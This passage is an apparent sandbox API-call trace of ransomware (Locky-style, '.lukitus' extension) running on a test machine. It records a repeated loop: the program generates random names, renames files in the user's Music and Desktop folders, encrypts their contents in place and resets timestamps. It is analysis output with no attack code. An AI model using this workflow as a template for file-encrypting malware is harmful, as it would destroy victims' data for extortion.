lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.678] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x18cdc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x18cdc, lpOverlapped=0x0) returned 1 [0108.678] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.678] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64cc5b90, dwHighDateTime=0x1d31760)) [0108.679] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.679] FlushFileBuffers (hFile=0x328) returned 1 [0108.682] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\xdiH1Dx3ohQnc.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\xdih1dx3ohqnc.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e0fc890, ftCreationTime.dwHighDateTime=0x1d2ff8d, ftLastAccessTime.dwLowDateTime=0x37b3ed00, ftLastAccessTime.dwHighDateTime=0x1d2f62f, ftLastWriteTime.dwLowDateTime=0x37b3ed00, ftLastWriteTime.dwHighDateTime=0x1d2f62f, nFileSizeHigh=0x0, nFileSizeLow=0xe485)) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.682] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.683] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\xdiH1Dx3ohQnc.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\xdih1dx3ohqnc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.683] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\xdiH1Dx3ohQnc.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\xdih1dx3ohqnc.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-CFA9A4CA-C26C379710F3.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-cfa9a4ca-c26c379710f3.lukitus"), dwFlags=0x9) returned 1 [0108.685] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.685] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.689] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xe485, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xe485, lpOverlapped=0x0) returned 1 [0108.690] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.690] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xe485, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xe485, lpOverlapped=0x0) returned 1 [0108.690] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.691] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64cebcf0, dwHighDateTime=0x1d31760)) [0108.691] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.691] FlushFileBuffers (hFile=0x328) returned 1 [0108.694] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\YDlFcD1yCL2Rp7.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ydlfcd1ycl2rp7.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cabc120, ftCreationTime.dwHighDateTime=0x1d2f617, ftLastAccessTime.dwLowDateTime=0xdded7370, ftLastAccessTime.dwHighDateTime=0x1d2f7c5, ftLastWriteTime.dwLowDateTime=0xdded7370, ftLastWriteTime.dwHighDateTime=0x1d2f7c5, nFileSizeHigh=0x0, nFileSizeLow=0x14592)) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.694] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\YDlFcD1yCL2Rp7.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ydlfcd1ycl2rp7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.694] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\YDlFcD1yCL2Rp7.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ydlfcd1ycl2rp7.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-085A70D2-BAEF6BF91BE0.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-085a70d2-baef6bf91be0.lukitus"), dwFlags=0x9) returned 1 [0108.696] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.696] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.702] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14592, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14592, lpOverlapped=0x0) returned 1 [0108.702] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.702] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14592, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14592, lpOverlapped=0x0) returned 1 [0108.703] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64d11e50, dwHighDateTime=0x1d31760)) [0108.703] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.703] FlushFileBuffers (hFile=0x328) returned 1 [0108.707] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\uG775ameeOobeX0HE.wav" (normalized: "c:\\users\\aetadzjz\\music\\ug775ameeoobex0he.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee144ed0, ftCreationTime.dwHighDateTime=0x1d2fa7d, ftLastAccessTime.dwLowDateTime=0xf77bd940, ftLastAccessTime.dwHighDateTime=0x1d2fde6, ftLastWriteTime.dwLowDateTime=0xf77bd940, ftLastWriteTime.dwHighDateTime=0x1d2fde6, nFileSizeHigh=0x0, nFileSizeLow=0x6edc)) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.707] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\uG775ameeOobeX0HE.wav" (normalized: "c:\\users\\aetadzjz\\music\\ug775ameeoobex0he.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.707] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\uG775ameeOobeX0HE.wav" (normalized: "c:\\users\\aetadzjz\\music\\ug775ameeoobex0he.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-9FE00690-5BE45D83E6B9.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-9fe00690-5be45d83e6b9.lukitus"), dwFlags=0x9) returned 1 [0108.709] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.709] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.714] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x6edc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x6edc, lpOverlapped=0x0) returned 1 [0108.714] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.714] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x6edc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x6edc, lpOverlapped=0x0) returned 1 [0108.715] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64d37fb0, dwHighDateTime=0x1d31760)) [0108.715] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.715] FlushFileBuffers (hFile=0x328) returned 1 [0108.718] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\upnIa15Gc.wav" (normalized: "c:\\users\\aetadzjz\\music\\upnia15gc.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff0cc2d0, ftCreationTime.dwHighDateTime=0x1d2fe79, ftLastAccessTime.dwLowDateTime=0x70e5c80, ftLastAccessTime.dwHighDateTime=0x1d30584, ftLastWriteTime.dwLowDateTime=0x70e5c80, ftLastWriteTime.dwHighDateTime=0x1d30584, nFileSizeHigh=0x0, nFileSizeLow=0x8731)) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.718] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\upnIa15Gc.wav" (normalized: "c:\\users\\aetadzjz\\music\\upnia15gc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.719] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\upnIa15Gc.wav" (normalized: "c:\\users\\aetadzjz\\music\\upnia15gc.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-DBCBC906-02DE713DF07B.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-dbcbc906-02de713df07b.lukitus"), dwFlags=0x9) returned 1 [0108.722] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.722] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.727] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8731, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8731, lpOverlapped=0x0) returned 1 [0108.727] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.728] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8731, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8731, lpOverlapped=0x0) returned 1 [0108.728] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.728] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64d37fb0, dwHighDateTime=0x1d31760)) [0108.728] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.728] FlushFileBuffers (hFile=0x328) returned 1 [0108.731] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\1E2KN90cFWYD.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\1e2kn90cfwyd.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb865500, ftCreationTime.dwHighDateTime=0x1d2fe48, ftLastAccessTime.dwLowDateTime=0x80724170, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x80724170, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x12d41)) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: 